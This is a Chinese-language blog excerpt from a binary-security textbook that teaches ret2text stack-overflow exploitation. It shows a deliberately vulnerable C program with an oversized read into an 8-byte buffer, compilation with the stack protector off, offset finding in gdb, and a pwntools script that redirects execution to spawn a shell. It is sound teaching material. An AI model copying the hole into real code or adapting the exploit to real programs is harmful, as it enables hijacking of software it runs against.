二进制漏洞挖掘之ret2text栈溢出

最新推荐文章于 2024-10-05 18:28:51 发布
最新推荐文章于 2024-10-05 18:28:51 发布
阅读量727 收藏 13
点赞数 15
文章标签: 二进制漏洞挖掘 二进制安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/brucexia/article/details/135961103
版权
本文介绍了栈溢出漏洞的成因,重点讲解了利用ROP和ret2text方法进行攻击的过程,包括获取buf与ebp距离、func函数地址,以及通过编写C代码和Python脚本实现漏洞利用并获取系统shell的详细步骤。
摘要由CSDN通过智能技术生成

栈溢出产生的主要原因是对一些边界未进行严格检查,攻击者可以通过覆盖函数的返回地址执行任意代码。栈溢出漏洞主要的利用方式是ROP(Return Oriented Programming,返回导向编程),通过覆盖返回地址,使程序跳转到恶意代码中,跳转的目标可以是:一段可以执行恶意命令的函数;某个全局变量空间;一个libc中的函数;一个系统调用的CPU指令序列等。

ret2text是栈溢出漏洞利用的一种方式,在程序的控制权发生跳转时,修改EIP为攻击指令的地址,且攻击指令是程序本身已有的代码(.text)。下面通过案例,实现基于ret2text方式栈溢出漏洞利用。

(1)编写C语言代码,保存文件名为“ret2text.c”,代码如下所示:

#include<stdio.h>
char sh[] = "/bin/sh";
int func()
{
    system(sh);
    return 0;
}
int dofunc()
{
    char buf[8] = {};
    puts("input:");
    read(0, buf, 0x100);
    return 0;
}
int main(int argc, char* argv[])
{
    dofunc();
    return 0;
}

由程序源码可知,dofunc函数返回时,可以利用read函数向buf写入适当数据,实现覆盖EIP,使程序跳转至func函数。为达到漏洞利用的目标,需要获取两个数据信息:buf与ebp的距离、func函数的地址。

(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。结果如图11-28所示。

图11-28

(3)继续执行程序,输入步骤2中生成的字符。结果如图11-29所示。

图11-29

由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。由图可知,buf与ebp的距离为16个字节,即0x10。

图11-30

(4)使用IDA打开ret2text程序,查看func函数地址,结果如图11-31所示。由图可知,func函数地址为0x0804846B。

图11-31

(5)编写exp脚本,保存文件名为“ret2text.py”,代码如下:

from pwn import *
context(arch = "i386", os = "linux")
p = process("./ret2text")
padding2ebp = 0x10
sys_addr = 0x0804846B
payload = 'a' * (padding2ebp + 4) + p32(sys_addr)
out = "input:"
p.sendlineafter(out, payload)
p.interactive()

执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,栈溢出漏洞利用成功,获取的shell能够正常使用。

图11-32

本文节选自《二进制安全基础》,获出版社和作者授权发布。

夏天又到了
关注
栈溢出总结+ret2text
MuMuLee_的博客
09-17 563
1、堆栈溢出原理 通俗的讲,栈溢出的原理就是不顾堆栈中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。 2、函数调用栈的结构和主要过程 图示: 文字说明: 汇编代码 push 参数 3 #参数由右向左入栈 push 参数 2 push 参数 1 call 函数地址 #push当前指令位置,跳转到所调用函...
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1493
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 1962
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
pwn自学笔记(1)--——ret2text
最新发布
CDU__mint__的博客
10-05 1180
此篇文章是对ret2text的学习初步总结。目标利用栈溢出执行危险程序获取shell。
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3518
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
漏洞挖掘的艺术-面向二进制的静态漏洞挖掘
Yale的博客
09-18 2137
0x00 本文是本系列的第二篇,将对面向二进制程序的静态漏洞挖掘技术进行介绍与分析。 面向二进制程序的静态漏洞的挖掘技术由于缺少源代码中的结构化信息,面临着值集分析(vaule-set analysis,VSA)与控制流恢复不精确的问题,但是二进制程序相对于源码而言更容易获得,所以这方面的研究工作一直都有新的研究动态,并且会在0x02部分介绍目前流程的两种技术。在进一步分析之前,我们首先来具体解释前文提出的两个问题。 0x01 1.1 值集分析是一种结合数值分析和指针分析的静态分析算法。VSA是一种基于抽象
堆栈认知——栈溢出实例(ret2text)_栈溢出以后他就能跳转到你指定的地
2401_83817971的博客
04-06 806
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
漏洞分析——二进制漏洞
sxr__nc的博客
01-10 5082
二进制漏洞:传统的缓冲区溢出、UAF(Use-After-Free)等涉及二进制编码的漏洞统称为二进制漏洞 根据缓冲区所处的不同内存空间以及分配方式的不同,缓冲区溢出可以分为栈溢出和堆溢出 栈溢出原理: 栈是一种基本的数据结构,是由编译器自动进行分配、释放的。栈遵循先进后出的规则,生长方向为从高向低生长,也就是地址由高到低 栈中存放的数据:对于要调用的子函数来说,存放子函数的参数、返回地址、局部变...
写在Linux栈溢出尝试的黎明前
singshinesong的博客
04-18 151
当然,希望还是要有的,总有那一小撮人,不愿随波逐流,不辞昼夜地做一些“无所谓”的试验,如与哪位过客有缘,愿意指点一二,仍旧十分感激!姑且当做一次小试牛刀吧,虽中途折戟,铩羽而归,但验证了一些什么,毫不后悔,“我来了,我看见,我没有征服”O(∩_∩)O哈哈~,只得总结下经验教训供大家借鉴吧。被攻击程序一般接受用户输入,理论上不接受输入的程序无法与用户交互,这种“一刀切”后果是用户只能使用它展示的内容,无法与其交互,体验效果不佳,当然相当安全了。就这还没有调试实现成功利用呢。”,提示找不到路径,“?
ctf中linux 内核态的漏洞挖掘与利用系列
Moyun_vackbot的博客
03-29 976
本篇文章主要针对内核栈溢出以及堆越界访问漏洞进行分析以及利用。
掌握基础:从简单的pwn可执行文件入门
在这个过程中,初学者会学习如何使用pwn工具,例如pwntools,这是一个专门为二进制漏洞挖掘和利用设计的Python框架,能够大大简化常见的pwn任务,如漏洞定位、生成shellcode、构造输入数据等。尽管这个文件是为入门...
IDAPythonScripts:基于IDAPython的二进制漏洞检测脚本库,对IDA生成的反汇编文件进行静态分析,并以XML形式报告可能存在的漏洞隐患点。Based on the binary vulnerability detection script library of IDAPYTHON, the disassembly file generated by IDA is static analyzed and the potential vulnerability points are rep
05-23
IDAPythonScripts IDAPythonScripts: 二进制漏洞静态分析检测脚本(IDA Pro) QQ交流群:813115551 加微信-进入交流群:wwy18795980897 准备 首先下载IDA Pro软件,版本 <= 6.8,7.0以上部分脚本不支持。 安装IDAPython插件。 IDAPython7.0链接: 密码: kg6y 漏洞内容(待更新) 危险函数调用 此脚本对IDA反汇编文件进行静态分析,检测其是否调用了可能产生漏洞的危险函数,没有找到汇编中的统一的危险函数集合,只好自己一点点积累,在functions.sql中可以看到一些常见的危险函数,保存在MySQL数据库中以后也方便Python调用。 栈堆缓冲区溢出漏洞 脚本从函数调用的地址向后跟踪推送到堆栈中的参数,并返回与指定参数对应的操作数。然后确定eax在被推入堆栈时是否指向堆栈缓冲区,存在可能造成
中级ROP
m0_49959202的博客
09-23 498
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
二进制漏洞挖掘技术实战
热门推荐
stonesharp的专栏
03-24 1万+
0×00前言 0X01漏洞挖掘方法 0X02手动法漏洞挖掘 0X03通用FUZZ法进行漏洞挖掘: 0X04智能FUZZ法进行漏洞挖掘: 0X05总结 正文 0X00 前言: 关于二进制的漏洞研究,大体可以分为漏洞分析利用和漏洞挖掘两部分。关于漏洞分析利用的部分互联网可以搜索到大量文章,而漏洞挖掘的文章却寥寥无几。因此我在这里主要来讲一下如何对
二进制漏洞利用原理--栈溢出
网络安全研究
12-28 803
函数的局部变量在栈中一个挨着一个排列。如果这些局部变量中有数组之类的缓冲区,并且程序中存在数组越界的缺陷,那么越界的数组元素就有可能破坏栈中相邻变量的值,甚至破坏栈帧中所保存的EBP值、返回地址等重要数据。
常见的二进制漏洞
m0_57836225的博客
08-27 644
如果攻击者精心构造输入,使得溢出的数据覆盖了函数的返回地址为`malicious_function`的地址,那么当`vulnerable_function`返回时,程序就会跳转到`malicious_function`执行。如果被恶意利用,可能导致程序崩溃或者执行恶意代码。|----------------| 未初始化数据段(BSS)|----------------| 栈(向下增长) 低地址。|----------------| 已初始化数据段。|----------------| 堆(向上增长)
ret2text
flamingobaby的博客
04-15 415
溢出对象:ret2text 调试工具: WinDbg,pattern.py,IDA 实验环境: Windows XP sp3,kali Linux 一、先查看下这个题逻辑 就是一个简单的输入输出程序。 二、查看一下程序的保护措施 开启了NX保护,因此不能在堆栈中写入shellcode。 三、IDA分析程序溢出点 gets()函数造成的溢出 四、判断变量到ret的偏移量...
二进制漏洞与利用学习
q664609859的博客
07-24 4409
二进制漏洞与利用学习 一、主要术语 Binary:由编译类语言生成的可执行程序 Vulnerability:Binary中包含的可被利用的Bug Exploit:借助Vulnerability来劫持Binary控制流的、经过特殊构造的数据 0day:可被exploit的位置Vulnerability Pwn:发现Vulnerability以及开发exploit的工作 二、目的: 获取shell
二进制漏洞挖掘栈溢出漏洞原理与ASLR防御
本文将详细介绍二进制漏洞挖掘中的栈溢出漏洞,特别是开启NX和ASLR的影响。 一、栈溢出漏洞原理 栈溢出漏洞是由于程序在对栈缓冲区进行写操作时,未对缓冲区大小进行判断,导致写入数据长度可能大于缓冲区长度,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值